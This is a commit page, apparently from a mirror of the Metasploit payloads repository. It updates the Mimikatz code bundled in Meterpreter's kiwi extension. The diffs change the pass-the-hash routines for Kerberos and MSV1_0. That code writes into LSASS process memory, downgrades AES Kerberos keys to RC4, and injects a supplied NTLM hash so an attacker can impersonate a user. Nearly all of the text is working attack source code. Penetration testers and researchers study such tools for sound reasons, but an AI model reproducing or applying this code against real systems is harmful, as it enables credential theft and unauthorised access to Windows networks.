github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-08 14:36:22 +01:00
Code Releases Activity

Update to Mimikatz commit 2cb6326ba2658e0d226d7a341fd6bf3bba2dbceb

Browse Source
This commit is contained in:
OJ 2014-07-08 20:02:44 +10:00
parent e7974b4707
commit fed3ebd43f
2 changed files with 24 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
View File

@ -228,8 +228,10 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
DWORD i, nbHash;
BYTE ntlmHash[LM_NTLM_HASH_LENGTH];
UNICODE_STRING nullPasswd = { 0, 0, NULL };
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory }, aLocalNTLMMemory = { ntlmHash, Localkerbsession.hMemory }, aLocalPasswdMemory = { &nullPasswd, Localkerbsession.hMemory }, aRemotePasswdMemory = { (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory };
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = { NULL, Localkerbsession.hMemory }, aLocalHashMemory = { NULL, Localkerbsession.hMemory }, aLocalNTLMMemory = { NULL, Localkerbsession.hMemory }, aLocalPasswdMemory = { &nullPasswd, Localkerbsession.hMemory }, aRemotePasswdMemory = { (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory };
PKERB_HASHPASSWORD_GENERIC pHash;
PBYTE baseCheck;
SIZE_T offset;
if (RemoteLocalKerbSession.address = *(PVOID *)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
{
@ -239,7 +241,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
{
if (nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
{
RemoteLocalKerbSession.address = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
RemoteLocalKerbSession.address = baseCheck = (PBYTE)RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
i = nbHash * (DWORD)kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
if (aLocalHashMemory.address = LocalAlloc(LPTR, i))
{
@ -249,15 +251,32 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
for (i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
{
kprintf(L" ");
pHash = (PKERB_HASHPASSWORD_GENERIC)((PBYTE)aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric);
offset = i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric;
pHash = (PKERB_HASHPASSWORD_GENERIC)((PBYTE)aLocalHashMemory.address + offset);
if ((pHash->Type == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) || (pHash->Type == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96))
{
kprintf(L"-");
pHash->Type = KERB_ETYPE_RC4_HMAC_NT;
pHash->Size = LM_NTLM_HASH_LENGTH;
aLocalNTLMMemory.address = pHash;
RemoteLocalKerbSession.address = baseCheck + offset;
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump)))
kprintf(L">");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
aLocalNTLMMemory.address = ntlmHash;
RemoteLocalKerbSession.address = pHash->Checksump;
RtlCopyMemory(aLocalNTLMMemory.address, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
if (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
(*pData->lsassLocalHelper->pLsaProtectMemory)(aLocalNTLMMemory.address, LM_NTLM_HASH_LENGTH);
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, pHash->Size ? (min(pHash->Size, LM_NTLM_HASH_LENGTH)) : LM_NTLM_HASH_LENGTH)) // ok not fair-play with AES-* and old CRC =)
if (pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, min(pHash->Size, LM_NTLM_HASH_LENGTH))) // ok not fair-play with AES-* and old CRC =)
kprintf(L"%u", i + 1);
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
if (pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
{
kprintf(L" ");

2
c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.c
View File

@ -57,7 +57,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
kprintf(L"Data copy MSV1_0 @ %p : ", origBufferAddress->address);
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
kprintf(L"OK !");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");